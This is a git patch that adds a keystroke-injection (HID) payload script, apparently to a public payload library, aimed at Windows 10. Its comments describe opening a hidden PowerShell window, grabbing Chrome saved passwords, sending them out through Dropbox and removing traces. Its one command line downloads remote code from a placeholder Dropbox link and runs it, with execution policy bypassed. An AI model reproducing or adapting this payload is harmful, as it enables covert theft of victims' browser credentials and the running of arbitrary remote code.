From bf506c8368ff23dd067f59daa6904d35f8fb79f9 Mon Sep 17 00:00:00 2001
From: "DIYS.py" <110927141+DIYSpy@users.noreply.github.com>
Date: Wed, 10 Aug 2022 21:05:47 -0400
Subject: [PATCH] Create payload.txt

---
 .../payload.txt                               | 28 +++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/payload.txt

diff --git a/payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/payload.txt b/payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/payload.txt
new file mode 100644
index 0000000..bc58d69
--- /dev/null
+++ b/payloads/library/credentials/Browser-Passwords-Dropbox-Exfiltration/payload.txt
@@ -0,0 +1,28 @@
+#########################################################################################################
+#                                                               |                                       #
+# Title        : Browser-Passwords-Dropbox-Exfiltration         |   ____ _____   ______                 #
+# Author       : DIYS.py                                        |  |  _ \_ _\ \ / / ___|  _ __  _   _   #
+# Version      : 1.0                                            |  | | | | | \ V /\___ \ | '_ \| | | |  #
+# Category     : Credentials, Exfiltration                      |  | |_| | |  | |  ___) || |_) | |_| |  #
+# Target       : Windows 10                                     |  |____/___| |_| |____(_) .__/ \__, |  #
+# Mode         : HID                                            |                        |_|    |___/   #
+# Props        : I am Jakoby, NULLSESSION0X                     |                                       #
+#                                                               |                                       # 
+#########################################################################################################
+
+REM Title: Browser-Passwords-Dropbox-Exfiltration
+REM Author: DIYS.py
+REM Description: Opens PowerShell hidden, grabs Chrome passwords, saves as a cleartext file and exfiltrates info via Dropbox.
+REM              Then it cleans up traces of what you have done after.
+REM Target: Windows 10 (PowerShell + Chrome)
+REM Version: 1.0
+REM Category: Credentials, Exfiltration
+
+
+DELAY 3000
+GUI r
+DELAY 250
+STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://< Your Shared link for the intended file>?dl=1; invoke-expression $pl
+
+REM     Remember to replace the link with your DropBox shared link for the intended file to download
+REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly